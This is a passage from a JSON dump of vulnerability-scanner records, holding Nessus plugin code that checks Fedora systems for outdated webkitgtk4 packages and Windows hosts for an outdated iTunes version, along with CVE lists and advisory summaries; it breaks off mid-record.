"CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-73D6A0DFBB.NASL", "href": "https://www.tenable.com/plugins/nessus/102047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-73d6a0dfbb.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102047);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-73d6a0dfbb\");\n\n script_name(english:\"Fedora 25 : webkitgtk4 (2017-73d6a0dfbb)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-73d6a0dfbb\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"webkitgtk4-2.16.6-1.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:57", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7018), [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7030), [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7034), [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7037), [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7039), [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7046), [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7048), [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7055), [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7056), [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7061), [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11 disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-28T00:00:00", "type": "nessus", "title": "Fedora 26 : webkitgtk4 (2017-24bddb96b5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-24BDDB96B5.NASL", "href": "https://www.tenable.com/plugins/nessus/102023", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-24bddb96b5.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102023);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-24bddb96b5\");\n\n script_name(english:\"Fedora 26 : webkitgtk4 (2017-24bddb96b5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-24bddb96b5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"webkitgtk4-2.16.6-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:35:57", "description": "This update addresses the following vulnerabilities :\n\n - [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7018), [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7030), [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7034), [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7037), [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7039), [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7046), [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7048), [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7055), [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7056), [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7061), [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11 disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-11T00:00:00", "type": "nessus", "title": "Fedora 24 : webkitgtk4 (2017-9d572cc64a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-7018", "CVE-2017-7030", "CVE-2017-7034", "CVE-2017-7037", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7048", "CVE-2017-7055", "CVE-2017-7056", "CVE-2017-7061", "CVE-2017-7064"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:webkitgtk4", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-9D572CC64A.NASL", "href": "https://www.tenable.com/plugins/nessus/102398", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9d572cc64a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102398);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"FEDORA\", value:\"2017-9d572cc64a\");\n\n script_name(english:\"Fedora 24 : webkitgtk4 (2017-9d572cc64a)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update addresses the following vulnerabilities :\n\n -\n [CVE-2017-7018](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7018),\n [CVE-2017-7030](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7030),\n [CVE-2017-7034](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7034),\n [CVE-2017-7037](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7037),\n [CVE-2017-7039](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7039),\n [CVE-2017-7046](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7046),\n [CVE-2017-7048](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7048),\n [CVE-2017-7055](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7055),\n [CVE-2017-7056](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7056),\n [CVE-2017-7061](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7061),\n [CVE-2017-7064](https://cve.mitre.org/cgi-bin/cvename.cg\n i?name=CVE-2017-7064)\n\nAdditional fixes :\n\n - Fix rendering of spin buttons with GTK+ >= 3.20 when the\n entry width is too short.\n\n - Fix the build when Wayland target is enabled and X11\n disabled.\n\n - Fix several crashes and rendering issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9d572cc64a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkitgtk4 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:webkitgtk4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"webkitgtk4-2.16.6-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkitgtk4\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:29:10", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.9.3. It is, therefore, affected by multiple vulnerabilities as referenced in the HT209450 advisory:\n\n - Multiple vulnerabilities exist due to input processing flaws in the WebKit component. An attacker may be able to leverage one of these vulnerability, by providing maliciously crafted web content, to execute arbitrary code on the host. (CVE-2019-6212, CVE-2019-6215, CVE-2019-6216, CVE-2019-6217, CVE-2019-6226, CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - A universal cross-site scripting vulnerability exists in the WebKit component. An attacker may be able to leverage this vulnerability, by providing maliciously crafted web content, to execute arbitrary script code in the security context of any site. (CVE-2019-6229)\n\n - A memory corruption vulnerability exists in the AppleKeyStore component. An attacker may be able to leverage this vulnerability to allow a process to circumvent sandbox restrictions. (CVE-2019-6235)\n\n - An out-of-bounds read vulnerability exists in the Core Media component. An attacker may be able to leverage this vulnerability to allow a malicious application to elevate its privileges. (CVE-2019-6221)\n\n - Multiple memory corruption issues exist in the SQLite component. An attacker may be able to leverage these vulnerabilities, by executing a malicious SQL query, to execute arbitrary code on the host. (CVE-2018-20346, CVE-2018-20505, CVE-2018-20506)\n\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2019-01-30T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.9.3 Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-20346", "CVE-2018-20505", "CVE-2018-20506", "CVE-2019-6212", "CVE-2019-6215", "CVE-2019-6216", "CVE-2019-6217", "CVE-2019-6221", "CVE-2019-6226", "CVE-2019-6227", "CVE-2019-6229", "CVE-2019-6233", "CVE-2019-6234", "CVE-2019-6235"], "modified": "2019-10-31T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_9_3.NASL", "href": "https://www.tenable.com/plugins/nessus/121473", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121473);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2018-20346\",\n \"CVE-2018-20505\",\n \"CVE-2018-20506\",\n \"CVE-2019-6212\",\n \"CVE-2019-6215\",\n \"CVE-2019-6216\",\n \"CVE-2019-6217\",\n \"CVE-2019-6221\",\n \"CVE-2019-6226\",\n \"CVE-2019-6227\",\n \"CVE-2019-6229\",\n \"CVE-2019-6233\",\n \"CVE-2019-6234\",\n \"CVE-2019-6235\"\n );\n script_bugtraq_id(\n 106323,\n 106691,\n 106694,\n 106696,\n 106698,\n 106699,\n 106724\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-1-24-1\");\n\n script_name(english:\"Apple iTunes < 12.9.3 Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on remote host is affected by multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.9.3. It is, therefore, affected by multiple vulnerabilities\nas referenced in the HT209450 advisory:\n\n - Multiple vulnerabilities exist due to input processing\n flaws in the WebKit component. An attacker may be able\n to leverage one of these vulnerability, by providing\n maliciously crafted web content, to execute arbitrary\n code on the host. (CVE-2019-6212, CVE-2019-6215,\n CVE-2019-6216, CVE-2019-6217, CVE-2019-6226,\n CVE-2019-6227, CVE-2019-6233, CVE-2019-6234)\n\n - A universal cross-site scripting vulnerability exists in\n the WebKit component. An attacker may be able to leverage\n this vulnerability, by providing maliciously crafted web\n content, to execute arbitrary script code in the security\n context of any site. (CVE-2019-6229)\n\n - A memory corruption vulnerability exists in the\n AppleKeyStore component. An attacker may be able to\n leverage this vulnerability to allow a process to\n circumvent sandbox restrictions. (CVE-2019-6235)\n\n - An out-of-bounds read vulnerability exists in the\n Core Media component. An attacker may be able to leverage\n this vulnerability to allow a malicious application to\n elevate its privileges. (CVE-2019-6221)\n\n - Multiple memory corruption issues exist in the SQLite\n component. An attacker may be able to leverage these\n vulnerabilities, by executing a malicious SQL query, to\n execute arbitrary code on the host. (CVE-2018-20346,\n CVE-2018-20505, CVE-2018-20506)\n\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT209450\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.9.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-6235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\nconstraints = [{\"fixed_version\":\"12.9.3\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE});\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:19:58", "description": "A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a 